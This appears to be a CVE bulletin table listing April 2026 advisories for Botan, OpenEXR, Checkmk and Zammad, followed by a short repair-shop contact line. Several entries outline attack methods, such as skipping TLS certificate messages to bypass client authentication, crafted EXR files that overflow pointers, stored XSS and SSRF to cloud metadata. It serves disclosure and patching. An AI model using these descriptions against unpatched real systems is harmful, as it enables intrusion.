| randombit--botan | Botan is a C++ cryptography library. Prior to version 3.11.1, the TLS 1.3 implementation allowed ApplicationData records to be processed prior to the Finished message being received. A server which is attempting to enforce client authentication via certificates can by bypassed by a client which entirely omits Certificate, CertificateVerify, and the Finished message and instead sends application data records. This vulnerability is fixed in 3.11.1. | 2026-04-07 | not yet calculated | CVE-2026-34582 | https://github.com/randombit/botan/security/advisories/GHSA-pxcj-9ppx-g86g |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.1.0 to before 3.2.7, 3.3.9, and 3.4.9, internal_exr_undo_piz() advances the working wavelet pointer with signed 32-bit arithmetic. Because nx, ny, and wcount are int, a crafted EXR file can make this product overflow and wrap. The next channel then decodes from an incorrect address. The wavelet decode path operates in place, so this yields both out-of-bounds reads and out-of-bounds writes. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | not yet calculated | CVE-2026-34588 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr5c-w6hf https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, the DWA lossy decoder constructs temporary per-component block pointers using signed 32-bit arithmetic. For a large enough width, the calculation overflows and later decoder stores operate on a wrapped pointer outside the allocated rowBlock backing store. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | not yet calculated | CVE-2026-34589 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| Checkmk GmbH--Checkmk | Insufficient sanitization of dashboard dashlet title links in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows an attacker with dashboard creation privileges to perform stored cross-site scripting (XSS) attacks by tricking a victim into clicking a crafted dashlet title link on a shared dashboard. | 2026-04-07 | not yet calculated | CVE-2026-3466 | https://checkmk.com/werk/19033 https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the HTML sanitizer for ticket articles was missing proper sanitization of data: ... URI schemes, resulting in storing such malicious content in the database of the Zammad instance. The Zammad GUI is rendering this content, due to applied CSP rules no harm was done by e.g., clicking such a link. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34718 | https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9fc7-jhf3 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the webhook model was missing a proper validation for loop back addresses, or link-local addresses - only the URL scheme (HTTP/HTTPS) as well as the hostname was checked. This could end up in retrieving confidential metadata of cloud/hosting providers. The existing check is now extended and is applied when configuring webhooks as well as triggering webhook jobs. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34719 | https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-vfh2-rw75 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was not verifying the header originates from a trusted SSO proxy/gateway before applying further actions on it. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34720 | https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w4h9-p2p7 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the OAuth callback endpoints for Microsoft, Google, and Facebook external credentials do not validate a CSRF state parameter. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34721 | https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-hx66-626c |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34722 | https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, unauthenticated remote attackers were able to access the getting started endpoint to get access to sensitive internal entity data, even after the system setup was completed. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34723 | https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, a server-side template injection vulnerability which leads to RCE via AI Agent exists. Impact is limited to environments where an attacker can control or influence type_enrichment_data (typically high-privilege administrative configuration). This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34724 | https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-jg8f-4j94 |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id was not checking if a user is privileged to use the text tool, resulting in being able to use it in all situations. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34782 | https://github.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, he REST endpoint POST /api/v1/ai_assistance/text_tools/:id contains an authorization failure. Context data (e.g., a group or organization) supplied to be used in the AI prompt were not checked if they are accessible for the current user. This leads to having data present in the AI prompt that were not authorized before being used. A user needs to have ticket.agent permission to be able to use the provided context data. This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34837 | https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8 |
n/a
請即與我們聯絡: fix@hk-computer-repair.com
有用連結:
